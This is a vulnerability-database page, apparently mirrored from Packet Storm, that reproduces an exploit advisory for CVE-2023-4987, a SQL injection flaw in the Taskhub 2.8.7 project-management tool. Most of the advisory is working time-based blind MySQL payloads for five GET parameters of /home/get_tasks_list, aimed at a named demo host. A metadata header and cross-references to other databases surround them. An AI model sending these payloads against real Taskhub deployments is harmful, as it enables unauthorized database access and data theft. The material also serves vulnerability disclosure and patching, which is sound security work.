Taskhub 2.8.7 SQL Injection

🗓️ 19 Sep 2023 00:00:00Reported by CraCkErType

packetstorm🔗 packetstormsecurity.com👁 412 Views

Taskhub 2.8.7 SQL Injection, unauthorized database acces

Reporter	Title	Published	Views	Family All 13
0day.today	Taskhub 2.8.7 SQL Injection Vulnerability	19 Sep 202300:00	–	zdt
0day.today	taskhub 2.8.7 - SQL Injection Vulnerability	26 Feb 202400:00	–	zdt
CNNVD	Infinitietech Taskhub SQL Injection Vulnerability	15 Sep 202300:00	–	cnnvd
CVE	CVE-2023-4987	15 Sep 202314:31	–	cve
Cvelist	CVE-2023-4987 infinitietech taskhub GET Parameter get_tasks_list sql injection	15 Sep 202314:31	–	cvelist
Exploit DB	taskhub 2.8.7 - SQL Injection	26 Feb 202400:00	–	exploitdb
EUVD	EUVD-2023-54817	3 Oct 202520:07	–	euvd
NVD	CVE-2023-4987	15 Sep 202315:15	–	nvd
OSV	CVE-2023-4987	15 Sep 202315:15	–	osv
Prion	Sql injection	15 Sep 202315:15	–	prion

`# Exploit Title: taskhub 2.8.7 - SQL Injection  
# Exploit Author: CraCkEr  
# Date: 05/09/2023  
# Vendor: Infinitie Technologies  
# Vendor Homepage: https://www.infinitietech.com/  
# Software Link: https://codecanyon.net/item/taskhub-project-management-finance-crm-tool/25685874  
# Demo: https://taskhub.company/auth  
# Tested on: Windows 10 Pro  
# Impact: Database Access  
# CVE: CVE-2023-4987  
# CWE: CWE-89 - CWE-74 - CWE-707  
  
  
## Greetings  
  
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka  
CryptoJob (Twitter) twitter.com/0x0CryptoJob  
  
  
## Description  
  
SQL injection attacks can allow unauthorized access to sensitive data, modification of  
data and crash the application or make it unavailable, leading to lost revenue and  
damage to a company's reputation.  
  
  
Path: /home/get_tasks_list  
  
GET parameter 'project' is vulnerable to SQL Injection  
GET parameter 'status' is vulnerable to SQL Injection  
GET parameter 'user_id' is vulnerable to SQL Injection  
GET parameter 'sort' is vulnerable to SQL Injection  
GET parameter 'search' is vulnerable to SQL Injection  
  
  
https://taskhub.company/home/get_tasks_list?project=[SQLi]&status=[SQLi]&from=&to=&workspace_id=1&user_id=[SQLi]&is_admin=&limit=10&sort=[SQLi]&order=&offset=0&search=[SQLi]  
  
  
---  
Parameter: project (GET)  
Type: time-based blind  
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)  
Payload: project='XOR(SELECT(0)FROM(SELECT(SLEEP(8)))a)XOR'Z&status=&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=id&order=desc&offset=0&search=  
  
Parameter: status (GET)  
Type: time-based blind  
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)  
Payload: project=&status='XOR(SELECT(0)FROM(SELECT(SLEEP(8)))a)XOR'Z&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=id&order=desc&offset=0&search=  
  
Parameter: user_id (GET)  
Type: time-based blind  
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)  
Payload: project=&status=&from=&to=&workspace_id=1&user_id=(SELECT(0)FROM(SELECT(SLEEP(8)))a)&is_admin=&limit=10&sort=id&order=desc&offset=0&search=  
  
Parameter: sort (GET)  
Type: time-based blind  
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)  
Payload: project=&status=&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=(SELECT(0)FROM(SELECT(SLEEP(6)))a)&order=desc&offset=0&search=  
  
Parameter: search (GET)  
Type: time-based blind  
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)  
Payload: project=&status=&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=id&order=desc&offset=0&search=') AND (SELECT(0)FROM(SELECT(SLEEP(7)))a)-- wXyW  
---  
  
  
[-] Done  
`

19 Sep 2023 00:00Current

7.1High risk

Vulners AI Score7.1

EPSS0.0008